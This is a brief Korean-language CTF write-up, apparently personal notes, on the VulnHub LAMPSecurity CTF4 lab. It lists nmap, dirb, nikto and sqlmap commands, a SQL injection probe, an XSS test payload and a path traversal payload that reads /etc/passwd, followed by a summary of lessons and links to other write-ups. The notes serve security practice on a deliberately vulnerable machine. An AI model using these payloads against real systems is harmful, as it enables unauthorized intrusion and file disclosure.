[vulnhub] LAMPSecurity: CTF4
# nmap -sn 192.168.1.11-20
# nmap -A 192.168.1.12
# dirb http:// 192.168.1.12
# nikto -h 192.168.1.12:80
http://192.168.1.12/index.html?page=blog&title=Blog&id=2’
검색창에 XSS 터짐
<script>alert(1)</script>
index.html?page=../../../../../../etc/passwd%00
# sqlmap -u http://192.168.1.103/index.html?page=blog&title=Blog&id=2 -p id
ssh 접속
이 연습을 통해 무엇을 배웠나요?
- SQL 주입 취약점 및 잠재적인 SQL 주입을 발견하기 위한 수동 방법
- SQLMAP 도구를 사용하여 SQL 주입을 자동화하는 방법
- 호스트 컴퓨터의 /etc/ssh/ssh 구성 파일을 수정해서 취약한 암호를 사용하는 호스트에 연결할 수 있는 방법입니다.
- ssh를 사용하여 원격 시스템에 연결하기
- netdiscover를 사용하여 네트워크에서 대상의 IP 주소를 찾는 방법
- NMAP 도구를 사용하여 실행 중인 열려 있는 포트와 서비스에 대한 대상을 스캔하는 방법
참고. https://medium.com/@optimus-pryme/hacking-the-lampsecurity-ctf4-ctf-challenge-889b2574419c
Hacking the LAMPSecurity: CTF4 (CTF Challenge)
Hello! I’m going to guide you in the LAMPSecurity CTF4 challenge today. It’s a boot2root challenge offered for practice, and the security…
medium.com
참고. https://syrion.me/lamp-security-ctf4-writeup/
Lamp Security CTF4 Writeup
Hi everyone. This is my solution for LAMP security CTF4. This CTF is very easy, you can download it from Vulnhub.com or play online on root-me.org].
syrion.me